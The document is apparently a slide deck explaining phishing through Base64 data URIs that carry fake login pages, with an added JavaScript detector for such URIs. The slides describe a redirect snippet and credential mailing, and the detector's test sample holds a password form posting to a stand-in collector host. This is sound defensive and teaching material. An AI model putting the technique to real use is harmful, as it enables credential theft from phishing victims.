ajin-abraham
New way of phishing with Data URI
PHISHING WITH DATA URI
DATA URI
• The data URI scheme is a URI scheme (Uniform Resource Identifier scheme) that provides a way to include data in-line in web pages as if they were external resources.
• MORE INFO : http://en.wikipedia.org/wiki/Data_URI_scheme
PHISHING OLD METHOD
login.php
Logs.txt
Username: [email protected]: strong p@ssw0rd
FAKE URL
All these are hosted under a website
Phishing with Data URI
mailer.php
Hyperlink / Redirect
This fake page is not hosted anywhere. It is made up of a data URI carrying Base64-encoded data.
Mails the hacker the stolen username and password.
Modified source code Base64 encoded
Modification: send the captured username and password to a PHP file, which may mail or log them.
Source code
data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=
Spreading
<script>window.location = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>
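A defender-side check for the pattern on the slides above, as an added example that is not part of the original deck: it finds data:text/html URIs in a mail body or page source, decodes them, and reports script tags, password fields and form targets. The function names, the sample mail and the collector.example host are constructed for illustration.

```javascript
// Added example (Node.js): detect HTML documents smuggled inside data: URIs.
// Matches data:text/html[;params],payload wherever it appears (href, src, window.location, ...).
const DATA_URI = /data:(text\/html|application\/xhtml\+xml)((?:;[^,;"'\s]+)*)\s*,\s*([^"'<>\s)]+)/gi;

// Decode the payload the way a browser would: Base64 if flagged, else percent-decoding.
function decodePayload(params, body) {
  if (/;base64/i.test(params)) {
    return Buffer.from(body.replace(/\s+/g, ""), "base64").toString("utf8");
  }
  try { return decodeURIComponent(body); } catch (e) { return body; }
}

// Return one finding per HTML data URI, with the indicators an analyst would triage on.
function scanForDataUriHtml(source) {
  const findings = [];
  for (const m of source.matchAll(DATA_URI)) {
    const html = decodePayload(m[2], m[3]);
    const formActions = [...html.matchAll(/<form\b[^>]*\baction\s*=\s*["']?([^"'\s>]+)/gi)]
      .map((a) => a[1]);
    findings.push({
      mediaType: m[1].toLowerCase(),
      hasScript: /<script\b/i.test(html),
      hasPasswordField: /<input\b[^>]*type\s*=\s*["']?password/i.test(html),
      formActions,   // where a login form inside the URI would post to
      decoded: html, // keep for the analyst; never render it
    });
  }
  return findings;
}

// Sample 1: the redirect snippet shown on the slide (payload is an alert box).
const PAGE_SAMPLE =
  '<script>window.location = "data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4="</script>';

// Sample 2 (constructed): a mail body whose link carries a login form, plus a benign image URI.
const CONSTRUCTED_FORM =
  '<form action="https://collector.example/mailer.php"><input type="password" name="p"></form>';
const CONSTRUCTED_MAIL =
  '<a href="data:text/html;base64,' + Buffer.from(CONSTRUCTED_FORM).toString("base64") +
  '">Sign in</a> <img src="data:image/png;base64,iVBORw0KGgo=">';

for (const sample of [PAGE_SAMPLE, CONSTRUCTED_MAIL]) {
  for (const f of scanForDataUriHtml(sample)) {
    console.log(f.mediaType, { script: f.hasScript, password: f.hasPasswordField, posts: f.formActions });
  }
}
```

Image and other non-HTML data URIs are ignored on purpose, so the check can run over ordinary mail and pages without flagging inline images.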
DATA URI PHISHING
Limitations
• Difficult to inject JavaScript in websites.
• Internet Explorer won’t support Data URI
DEMO